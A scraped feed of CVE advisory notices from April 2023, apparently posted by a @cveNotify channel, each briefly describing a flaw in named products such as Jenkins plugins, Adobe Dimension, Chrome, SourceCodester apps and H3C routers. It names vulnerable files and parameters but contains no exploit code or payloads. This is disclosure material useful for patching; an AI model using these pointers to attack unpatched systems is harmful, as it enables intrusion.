🚨 CVE-2023-2042A vulnerability, which was classified as problematic, has been found in DataGear up to 4.5.1. Affected by this issue is some unknown functionality of the component JDBC Server Handler. The manipulation leads to deserialization. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225920. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-14 12:58:13 |
🚨 CVE-2023-2043A vulnerability, which was classified as problematic, was found in Control iD 23.3.19.0. This affects an unknown part of the file /v2/customerdb/operator.svc/a of the component Edit Handler. The manipulation of the argument email leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-225921 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-14 12:58:12 |
🚨 CVE-2023-2044A vulnerability has been found in Control iD iDSecure 4.7.29.1 and classified as problematic. This vulnerability affects unknown code of the component Dispositivos Page. The manipulation of the argument IP-DNS leads to cross site scripting. The attack can be initiated remotely. VDB-225922 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-04-14 11:58:13 |
🚨 CVE-2023-2036A vulnerability was found in Campcodes Video Sharing Website 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file upload.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-225914 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-14 11:58:12 |
🚨 CVE-2023-26123Versions of the package raysan5/raylib before 4.5.0 are vulnerable to Cross-site Scripting (XSS) such that the SetClipboardText API does not properly escape the ' character, allowing attacker-controlled input to break out of the string and execute arbitrary JavaScript via emscripten_run_script function.**Note:** This vulnerability is present only when compiling raylib for PLATFORM_WEB. All the other Desktop/Mobile/Embedded platforms are not affected.🎖@cveNotify |
|
| 2023-04-14 05:58:27 |
🚨 CVE-2023-26371Adobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability when parsing a crafted file, which could result in a read past the end of an allocated memory structure. An attacker could leverage this vulnerability to execute code in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-14 05:58:26 |
🚨 CVE-2023-26374Adobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-14 05:58:25 |
🚨 CVE-2023-26375Adobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-14 05:58:21 |
🚨 CVE-2023-26379Adobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-14 05:58:20 |
🚨 CVE-2023-26377Adobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-14 05:58:19 |
🚨 CVE-2023-26378Adobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-14 05:58:18 |
🚨 CVE-2023-26380Adobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-14 05:58:15 |
🚨 CVE-2023-26381Adobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-14 05:58:14 |
🚨 CVE-2023-26400Adobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-14 05:58:13 |
🚨 CVE-2023-26401Adobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-14 05:58:12 |
🚨 CVE-2023-26404Adobe Dimension version 3.4.8 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-14 01:58:38 |
🚨 CVE-2023-30518A missing permission check in Jenkins Thycotic Secret Server Plugin 1.0.2 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.🎖@cveNotify |
|
| 2023-04-14 01:58:37 |
🚨 CVE-2023-30519A missing permission check in Jenkins Quay.io trigger Plugin 0.1 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.🎖@cveNotify |
|
| 2023-04-14 01:58:36 |
🚨 CVE-2023-30520Jenkins Quay.io trigger Plugin 0.1 and earlier does not limit URL schemes for repository homepage URLs submitted via Quay.io trigger webhooks, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to submit crafted Quay.io trigger webhook payloads.🎖@cveNotify |
|
| 2023-04-14 01:58:35 |
🚨 CVE-2023-30521A missing permission check in Jenkins Assembla merge request builder Plugin 1.1.13 and earlier allows unauthenticated attackers to trigger builds of jobs corresponding to the attacker-specified repository.🎖@cveNotify |
|
| 2023-04-14 01:58:33 |
🚨 CVE-2023-30522A missing permission check in Jenkins Fogbugz Plugin 2.2.17 and earlier allows attackers with Item/Read permission to trigger builds of jobs specified in a 'jobname' request parameter.🎖@cveNotify |
|
| 2023-04-14 01:58:32 |
🚨 CVE-2023-30523Jenkins Report Portal Plugin 0.5 and earlier stores ReportPortal access tokens unencrypted in job config.xml files on the Jenkins controller as part of its configuration where they can be viewed by users with Item/Extended Read permission or access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-04-14 01:58:31 |
🚨 CVE-2023-30524Jenkins Report Portal Plugin 0.5 and earlier does not mask ReportPortal access tokens displayed on the configuration form, increasing the potential for attackers to observe and capture them.🎖@cveNotify |
|
| 2023-04-14 01:58:30 |
🚨 CVE-2023-30525A cross-site request forgery (CSRF) vulnerability in Jenkins Report Portal Plugin 0.5 and earlier allows attackers to connect to an attacker-specified URL using attacker-specified bearer token authentication.🎖@cveNotify |
|
| 2023-04-14 01:58:29 |
🚨 CVE-2023-30526A missing permission check in Jenkins Report Portal Plugin 0.5 and earlier allows attackers with Overall/Read permission to connect to an attacker-specified URL using attacker-specified bearer token authentication.🎖@cveNotify |
|
| 2023-04-14 01:58:28 |
🚨 CVE-2023-30527Jenkins WSO2 Oauth Plugin 1.0 and earlier stores the WSO2 Oauth client secret unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-04-14 01:58:24 |
🚨 CVE-2023-30528Jenkins WSO2 Oauth Plugin 1.0 and earlier does not mask the WSO2 Oauth client secret on the global configuration form, increasing the potential for attackers to observe and capture it.🎖@cveNotify |
|
| 2023-04-14 01:58:23 |
🚨 CVE-2023-30529Jenkins Lucene-Search Plugin 387.v938a_ecb_f7fe9 and earlier does not require POST requests for an HTTP endpoint, allowing attackers to reindex the database.🎖@cveNotify |
|
| 2023-04-14 01:58:22 |
🚨 CVE-2023-30530Jenkins Consul KV Builder Plugin 2.0.13 and earlier stores the HashiCorp Consul ACL Token unencrypted in its global configuration file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system.🎖@cveNotify |
|
| 2023-04-14 01:58:21 |
🚨 CVE-2023-30531Jenkins Consul KV Builder Plugin 2.0.13 and earlier does not mask the HashiCorp Consul ACL Token on the global configuration form, increasing the potential for attackers to observe and capture it.🎖@cveNotify |
|
| 2023-04-14 01:58:20 |
🚨 CVE-2023-30532A missing permission check in Jenkins TurboScript Plugin 1.3 and earlier allows attackers with Item/Read permission to trigger builds of jobs corresponding to the attacker-specified repository.🎖@cveNotify |
|
| 2023-04-14 01:58:16 |
🚨 CVE-2023-1985A vulnerability, which was classified as critical, has been found in SourceCodester Online Computer and Laptop Store 1.0. This issue affects the function save_brand of the file /classes/Master.php?f=save_brand. The manipulation of the argument name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-225533 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-14 01:58:15 |
🚨 CVE-2023-1986A vulnerability, which was classified as critical, was found in SourceCodester Online Computer and Laptop Store 1.0. Affected is the function delete_order of the file /classes/master.php?f=delete_order. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-225534 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-04-14 01:58:14 |
🚨 CVE-2023-1987A vulnerability has been found in SourceCodester Online Computer and Laptop Store 1.0 and classified as critical. Affected by this vulnerability is the function update_order_status of the file /classes/Master.php?f=update_order_status. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-225535.🎖@cveNotify |
|
| 2023-04-14 01:58:13 |
🚨 CVE-2023-1988A vulnerability was found in SourceCodester Online Computer and Laptop Store 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /admin/?page=maintenance/brand. The manipulation of the argument Brand Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-225536.🎖@cveNotify |
|
| 2023-04-14 01:58:12 |
🚨 CVE-2023-26773Cross Site Scripting vulnerability found in Sales Tracker Management System v.1.0 allows a remote attacker to gain privileges via the product list function in the Master.php file.🎖@cveNotify |
|
| 2023-04-13 18:58:20 |
🚨 CVE-2023-20664In gz, there is a possible double free due to a use after free. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07505952; Issue ID: ALPS07505952.🎖@cveNotify |
|
| 2023-04-13 18:58:19 |
🚨 CVE-2023-20663In wlan, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07560741; Issue ID: ALPS07560741.🎖@cveNotify |
|
| 2023-04-13 18:58:18 |
🚨 CVE-2023-27803H3C Magic R100 R100V100R005.bin was discovered to contain a stack overflow via the EdittriggerList interface at /goform/aspForm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted payload.🎖@cveNotify |
|
| 2023-04-13 18:58:17 |
🚨 CVE-2023-27801H3C Magic R100 R100V100R005.bin was discovered to contain a stack overflow via the DelDNSHnList interface at /goform/aspForm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted payload.🎖@cveNotify |
|
| 2023-04-13 18:58:16 |
🚨 CVE-2023-27802H3C Magic R100 R100V100R005.bin was discovered to contain a stack overflow via the EditvsList parameter at /goform/aspForm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted payload.🎖@cveNotify |
|
| 2023-04-13 18:58:14 |
🚨 CVE-2023-27805H3C Magic R100 R100V100R005.bin was discovered to contain a stack overflow via the EditSTList interface at /goform/aspForm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted payload.🎖@cveNotify |
|
| 2023-04-13 18:58:13 |
🚨 CVE-2023-27806H3C Magic R100 R100V100R005.bin was discovered to contain a stack overflow via the ipqos_lanip_dellist interface at /goform/aspForm. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted payload.🎖@cveNotify |
|
| 2023-04-13 18:58:12 |
🚨 CVE-2023-27779AM Presencia v3.7.3 was discovered to contain a SQL injection vulnerability via the user parameter in the login form.🎖@cveNotify |
|
| 2023-04-13 16:58:37 |
🚨 CVE-2023-26552mstolfp in libntp/mstolfp.c in NTP 4.2.8p15 has an out-of-bounds write when adding a decimal point. An adversary may be able to attack a client ntpq process, but cannot attack ntpd.🎖@cveNotify |
|
| 2023-04-13 16:58:36 |
🚨 CVE-2023-26555praecis_parse in ntpd/refclock_palisade.c in NTP 4.2.8p15 has an out-of-bounds write. Any attack method would be complex, e.g., with a manipulated GPS receiver.🎖@cveNotify |
|
| 2023-04-13 16:58:35 |
🚨 CVE-2023-26553mstolfp in libntp/mstolfp.c in NTP 4.2.8p15 has an out-of-bounds write when copying the trailing number. An adversary may be able to attack a client ntpq process, but cannot attack ntpd.🎖@cveNotify |
|
| 2023-04-13 16:58:34 |
🚨 CVE-2023-26554mstolfp in libntp/mstolfp.c in NTP 4.2.8p15 has an out-of-bounds write when adding a '\0' character. An adversary may be able to attack a client ntpq process, but cannot attack ntpd.🎖@cveNotify |
|
| 2023-04-13 16:58:32 |
🚨 CVE-2022-4941The WCFM Membership plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 2.9.10 due to missing nonce checks on various AJAX actions. This makes it possible for unauthenticated attackers to perform a wide variety of actions such as modifying membership details, changing renewal information, controlling membership approvals, and more, via a forged request granted they can trick a site's administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-13 16:58:31 |
🚨 CVE-2022-48010** DISPUTED ** LimeSurvey v5.4.15 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the component /index.php/surveyAdministration/rendersidemenulink?subaction=surveytexts. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Description or Welcome-message text fields. NOTE: the vendor indicates that this is not a vulnerability because the manipulation requires Superadministrator privileges, and Superadministrators are already allowed to customize surveys with JavaScript as they wish.🎖@cveNotify |
|
| 2023-04-13 16:58:30 |
🚨 CVE-2023-1726Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Proliz OBS allows Stored XSS for an authenticated user.This issue affects OBS: before 23.04.01.🎖@cveNotify |
|
| 2023-04-13 16:58:28 |
🚨 CVE-2023-20653In keyinstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628168; Issue ID: ALPS07589144.🎖@cveNotify |
|
| 2023-04-13 16:58:27 |
🚨 CVE-2022-43914IBM TRIRIGA Application Platform 4.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 241036.🎖@cveNotify |
|
| 2023-04-13 16:58:26 |
🚨 CVE-2023-20652In keyinstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07628168; Issue ID: ALPS07589135.🎖@cveNotify |
|
| 2023-04-13 16:58:25 |
🚨 CVE-2023-27876IBM TRIRIGA 4.0 is vulnerable to an XML external entity injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 249975.🎖@cveNotify |
|
| 2023-04-13 16:58:23 |
🚨 CVE-2023-1924The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_toolbar_save_settings_callback function. This makes it possible for unauthenticated attackers to change cache settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-13 16:58:22 |
🚨 CVE-2023-1925The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the wpfc_clear_cache_of_allsites_callback function. This makes it possible for unauthenticated attackers to clear caches via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-13 16:58:18 |
🚨 CVE-2023-1926The WP Fastest Cache plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.1.2. This is due to missing or incorrect nonce validation on the deleteCacheToolbar function. This makes it possible for unauthenticated attackers to perform cache deletion via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2023-04-13 16:58:17 |
🚨 CVE-2022-32599In rpmb, there is a possible out of bounds write due to a logic error. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07460390; Issue ID: ALPS07460390.🎖@cveNotify |
|
| 2023-04-13 16:58:16 |
🚨 CVE-2023-27812bloofox v0.5.2 was discovered to contain an arbitrary file deletion vulnerability via the delete_file() function.🎖@cveNotify |
|
| 2023-04-13 16:58:15 |
🚨 CVE-2023-29597bloofox v0.5.2 was discovered to contain a SQL injection vulnerability via the component /index.php?mode=content&page=pages&action=edit&eid=1.🎖@cveNotify |
|
| 2023-04-13 16:58:14 |
🚨 CVE-2023-29598lmxcms v1.4.1 was discovered to contain a SQL injection vulnerability via the setbook parameter at index.php.🎖@cveNotify |
|
| 2023-04-13 14:58:15 |
🚨 CVE-2023-2021Cross-site Scripting (XSS) - Stored in GitHub repository nilsteampassnet/teampass prior to 3.0.3.🎖@cveNotify |
|
| 2023-04-13 14:58:14 |
🚨 CVE-2022-45064The SlingRequestDispatcher doesn't correctly implement the RequestDispatcher API resulting in a generic type of include-based cross-site scripting issues on the Apache Sling level. The vulnerability is exploitable by an attacker that is able to include a resource with specific content-type and control the include path (i.e. writing content). The impact of a successful attack is privilege escalation to administrative power.Please update to Apache Sling Engine >= 2.14.0 and enable the "Check Content-Type overrides" configuration option.🎖@cveNotify |
|
| 2023-04-13 06:01:43 |
🚨 CVE-2023-1821Inappropriate implementation in WebShare in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to potentially hide the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-04-13 06:01:42 |
🚨 CVE-2023-1823Inappropriate implementation in FedCM in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-04-13 06:01:41 |
🚨 CVE-2023-1812Out of bounds memory access in DOM Bindings in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-13 06:01:38 |
🚨 CVE-2023-26437Denial of service vulnerability in PowerDNS Recursor allows authoritative servers to be marked unavailable.This issue affects Recursor: through 4.6.5, through 4.7.4 , through 4.8.3.🎖@cveNotify |
|
| 2023-04-13 06:01:37 |
🚨 CVE-2023-2014Cross-site Scripting (XSS) - Generic in GitHub repository microweber/microweber prior to 1.3.3.🎖@cveNotify |
|
| 2023-04-13 06:01:36 |
🚨 CVE-2023-1994GQUIC dissector crash in Wireshark 4.0.0 to 4.0.4 and 3.6.0 to 3.6.12 allows denial of service via packet injection or crafted capture file🎖@cveNotify |
|
| 2023-04-13 06:01:32 |
🚨 CVE-2023-22235InCopy versions 18.1 (and earlier), 17.4 (and earlier) are affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-13 06:01:31 |
🚨 CVE-2023-26384Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-13 06:01:30 |
🚨 CVE-2023-26385Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-13 06:01:27 |
🚨 CVE-2023-26386Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-13 06:01:26 |
🚨 CVE-2023-26388Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by an Improper Input Validation vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-13 06:01:25 |
🚨 CVE-2023-26390Adobe Substance 3D Stager version 2.0.1 (and earlier) is affected by a Stack-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-04-12 20:58:18 |
🚨 CVE-2023-0319An issue has been discovered in GitLab affecting all versions starting from 13.6 before 15.8.5, all versions starting from 15.9 before 15.9.4, all versions starting from 15.10 before 15.10.1, allowing to read environment names supposed to be restricted to project memebers only.🎖@cveNotify |
|
| 2023-04-12 19:58:23 |
🚨 CVE-2023-1855A use-after-free flaw was found in xgene_hwmon_remove in drivers/hwmon/xgene-hwmon.c in the Hardware Monitoring Linux Kernel Driver (xgene-hwmon). This flaw could allow a local attacker to crash the system due to a race problem. This vulnerability could even lead to a kernel information leak problem.🎖@cveNotify |
|
| 2023-04-12 19:58:22 |
🚨 CVE-2023-28849GLPI is a free asset and IT management software package. Starting in version 10.0.0 and prior to version 10.0.7, GLPI inventory endpoint can be used to drive a SQL injection attack. It can also be used to store malicious code that could be used to perform XSS attack. By default, GLPI inventory endpoint requires no authentication. Version 10.0.7 contains a patch for this issue. As a workaround, disable native inventory.🎖@cveNotify |
|
| 2023-04-12 19:58:20 |
🚨 CVE-2023-28855Fields is a GLPI plugin that allows users to add custom fields on GLPI items forms. Prior to versions 1.13.1 and 1.20.4, lack of access control check allows any authenticated user to write data to any fields container, including those to which they have no configured access. Versions 1.13.1 and 1.20.4 contain a patch for this issue.🎖@cveNotify |
|
| 2023-04-12 17:58:18 |
🚨 CVE-2023-1883Improper Access Control in GitHub repository thorsten/phpmyfaq prior to 3.1.12.🎖@cveNotify |
|
| 2023-04-12 17:58:17 |
🚨 CVE-2023-27762An issue found in Wondershare Technology Co., Ltd DemoCreator v.6.0.0 allows a remote attacker to execute arbitrary commands via the democreator_setup_full7743.exe file.🎖@cveNotify |
|
| 2023-04-12 17:58:16 |
🚨 CVE-2023-27763An issue found in Wondershare Technology Co.,Ltd MobileTrans v.4.0.2 allows a remote attacker to execute arbitrary commands via the mobiletrans_setup_full5793.exe file.🎖@cveNotify |
|
| 2023-04-12 17:58:15 |
🚨 CVE-2023-27761An issue found in Wondershare Technology Co., Ltd UniConverter v.14.0.0 allows a remote attacker to execute arbitrary commands via the uniconverter14_64bit_setup_full14204.exe file.🎖@cveNotify |
|
| 2023-04-12 17:58:14 |
🚨 CVE-2020-36072SQL injection vulnerability found in Tailor Management System v.1 allows a remote attacker to execute arbitrary code via the id parameter.🎖@cveNotify |
|
| 2023-04-12 14:58:28 |
🚨 CVE-2023-1750The listed versions of Nexx Smart Home devices lack proper access control when executing actions. An attacker with a valid NexxHome deviceId could retrieve device history, set device settings, and retrieve device information.🎖@cveNotify |
|
| 2023-04-12 14:58:26 |
🚨 CVE-2023-1749The listed versions of Nexx Smart Home devices lack proper access control when executing actions. An attacker with a valid NexxHome deviceId could send API requests that the affected devices would execute.🎖@cveNotify |
|
| 2023-04-12 14:58:25 |
🚨 CVE-2023-1748The listed versions of Nexx Smart Home devices use hard-coded credentials. An attacker with unauthenticated access to the Nexx Home mobile application or the affected firmware could view the credentials and access the MQ Telemetry Server (MQTT) server and the ability to remotely control garage doors or smart plugs for any customer.🎖@cveNotify |
|
| 2023-04-12 14:58:23 |
🚨 CVE-2022-24350An issue was discovered in IhisiSmm in Insyde InsydeH2O with kernel 5.0 through 5.5. Specially formatted buffer contents used for software SMI could cause SMRAM corruption, leading to escalation of privilege.🎖@cveNotify |
|
| 2023-04-12 14:58:22 |
🚨 CVE-2022-47053An arbitrary file upload vulnerability in the Digital Assets Manager module of DNN Corp DotNetNuke v7.0.0 to v9.10.2 allows attackers to execute arbitrary code via a crafted SVG file.🎖@cveNotify |
|
| 2023-04-12 14:58:21 |
🚨 CVE-2023-22616An issue was discovered in Insyde InsydeH2O with kernel 5.2 through 5.5. The Save State register is not checked before use. The IhisiSmm driver does not check the value of a save state register before use. Due to insufficient input validation, an attacker can corrupt SMRAM.🎖@cveNotify |
|
| 2023-04-12 14:58:19 |
🚨 CVE-2023-27826SeowonIntech SWC 5100W WIMAX Bootloader 1.18.19.0, HW 0.0.7.0, and FW 1.11.0.1, 1.9.9.4 are vulnerable to OS Command Injection. which allows attackers to take over the system with root privilege by abusing doSystem() function.🎖@cveNotify |
|
| 2023-04-12 14:58:15 |
🚨 CVE-2023-29574Bento4 v1.6.0-639 was discovered to contain an out-of-memory bug in the mp42avc component.🎖@cveNotify |
|
| 2023-04-12 14:58:14 |
🚨 CVE-2023-29580yasm 1.3.0.55.g101bc was discovered to contain a segmentation violation via the component yasm_expr_create at /libyasm/expr.c.🎖@cveNotify |
|
| 2023-04-12 14:58:13 |
🚨 CVE-2023-1829A use-after-free vulnerability in the Linux Kernel traffic control index filter (tcindex) can be exploited to achieve local privilege escalation. The tcindex_delete function which does not properly deactivate filters in case of a perfect hashes while deleting the underlying structure which can later lead to double freeing the structure. A local attacker user can use this vulnerability to elevate its privileges to root.We recommend upgrading past commit 8c710f75256bb3cf05ac7b1672c82b92c43f3d28.🎖@cveNotify |
|
| 2023-04-12 14:58:12 |
🚨 CVE-2022-48437An issue was discovered in x509/x509_verify.c in LibreSSL before 3.6.1, and in OpenBSD before 7.2 errata 001. x509_verify_ctx_add_chain does not store errors that occur during leaf certificate verification, and therefore an incorrect error is returned. This behavior occurs when there is an installed verification callback that instructs the verifier to continue upon detecting an invalid certificate.🎖@cveNotify |
|
| 2023-04-12 11:01:59 |
🚨 CVE-2022-48437An issue was discovered in x509/x509_verify.c in LibreSSL before 3.6.1, and in OpenBSD before 7.2 errata 001. x509_verify_ctx_add_chain does not store errors that occur during leaf certificate verification, and therefore an incorrect error is returned. This behavior occurs when there is an installed verification callback that instructs the verifier to continue upon detecting an invalid certificate.🎖@cveNotify |
|
| 2023-04-12 06:04:21 |
🚨 CVE-2023-1821Inappropriate implementation in WebShare in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to potentially hide the contents of the Omnibox (URL bar) via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-04-12 06:04:20 |
🚨 CVE-2023-1822Incorrect security UI in Navigation in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to perform domain spoofing via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-04-12 06:04:18 |
🚨 CVE-2023-1823Inappropriate implementation in FedCM in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-04-12 06:04:17 |
🚨 CVE-2023-1812Out of bounds memory access in DOM Bindings in Google Chrome prior to 112.0.5615.49 allowed a remote attacker to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-04-12 06:04:16 |
🚨 CVE-2023-28447Smarty is a template engine for PHP. In affected versions smarty did not properly escape javascript code. An attacker could exploit this vulnerability to execute arbitrary JavaScript code in the context of the user's browser session. This may lead to unauthorized access to sensitive user data, manipulation of the web application's behavior, or unauthorized actions performed on behalf of the user. Users are advised to upgrade to either version 3.1.48 or to 4.3.1 to resolve this issue. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-04-12 06:04:14 |
🚨 CVE-2023-1534Out of bounds read in ANGLE in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-12 06:04:13 |
🚨 CVE-2022-43634This vulnerability allows remote attackers to execute arbitrary code on affected installations of Netatalk. Authentication is not required to exploit this vulnerability. The specific flaw exists within the dsi_writeinit function. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-17646.🎖@cveNotify |
|
| 2023-04-12 06:04:12 |
🚨 CVE-2023-1528Use after free in Passwords in Google Chrome prior to 111.0.5563.110 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-12 06:04:11 |
🚨 CVE-2023-1529Out of bounds memory access in WebHID in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a malicious HID device. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-12 06:04:10 |
🚨 CVE-2023-1530Use after free in PDF in Google Chrome prior to 111.0.5563.110 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-04-12 06:04:06 |
